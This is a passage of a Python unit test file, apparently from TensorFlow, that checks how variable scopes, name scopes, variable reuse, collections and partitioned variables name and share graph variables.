self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeObjectReuse(self):
with self.cached_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, x.eval())
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: 'variable_scope' object has no attribute
# '_graph_context_manager'
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "scope/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name,
"outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
# (different assertions failing after wrapping, in both execution modes)
@test_util.run_in_graph_and_eager_modes
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
# Since variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSignatureGetVarVsGetLocalVar(self):
"""get_{local,}variable() must take the same list of args."""
arg_names = tf_inspect.getargspec(variable_scope.get_variable)[0]
local_arg_names = tf_inspect.getargspec(
variable_scope.get_local_variable)[0]
self.assertEqual(arg_names, local_arg_names)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetCollection(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithGetVariable(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.get_variable(
"testGetTrainableVariables_d", [],
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
# All other sync values sets trainable=True
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithVariable(self):
with self.cached_session():
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_a")
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_b")
_ = variable_scope.variable(
1.0, name="testGetTrainableVariables_c", trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_d",
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
# All other sync values sets trainable=True
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetGlobalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetLocalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part
def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part
def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part
class VariableScopeWithPartitioningTest(test.TestCase):
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testResultNameMatchesRequested(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxisResource(self):
